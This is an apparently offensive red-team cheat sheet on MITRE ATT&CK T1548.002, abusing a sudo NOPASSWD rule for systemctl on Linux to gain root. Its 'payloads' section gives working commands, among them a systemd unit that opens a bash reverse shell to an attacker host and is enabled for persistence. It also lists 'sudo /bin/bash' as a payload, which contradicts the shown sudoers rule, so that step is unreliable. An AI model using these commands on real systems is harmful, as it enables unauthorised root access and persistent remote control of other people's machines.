[GenosX]

Category: Persistence / Privilege Escalation / Evasion
Framework: MITRE ATT&CK
Technique: T1548.002 — Abuse Elevation Control Mechanism: Bypass User Account Control (sudo)
OS: Linux / Unix-like
Tech level: Intermediate–Advanced
Source: https://attack.mitre.org/techniques/T1548/002/
 

---

Overview

T1548.002 is all about abusing sudo to run commands with elevated privileges. If an attacker gains access to a user listed in /etc/sudoers with NOPASSWD permissions, they can escalate privileges locally and even maintain persistence.
 
It can also be used for evasion — letting you run root-level commands without triggering user-context-based detection.
 

---

 Real-world Example

Let’s say the attacker gets a shell (maybe via CVE or leaked creds) and lands as developer. They check sudo perms:

developer@target:~$ sudo -l
Matching Defaults entries for developer on target:
    !requiretty, env_reset, env_keep+=SSH_AUTH_SOCK
 
User developer may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/systemctl

 

---

Analysis

NOPASSWD means no password prompt — that’s already gold.
 
systemctl can be abused to run arbitrary services, and by extension, get a root shell.
 

---

Privilege Escalation Payloads

sudo /usr/bin/systemctl start sshd.service
sudo /bin/bash

Or go stealthy with a reverse shell service:

echo -e "[Service]\nType=oneshot\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attackerip/4444 0>&1'\n[Install]\nWantedBy=multi-user.target" > /tmp/root.service
 
sudo systemctl link /tmp/root.service
sudo systemctl enable --now root.service

 

---

Result:
Reverse shell as root on the box.  

References:
 
MITRE ATT&CK: https://attack.mitre.org/techniques/T1548/002/
 
GTFOBins: https://gtfobins.github.io/gtfobins/systemctl/
 
Red Team TTPs: https://book.hacktricks.xyz/linux-harden...escalation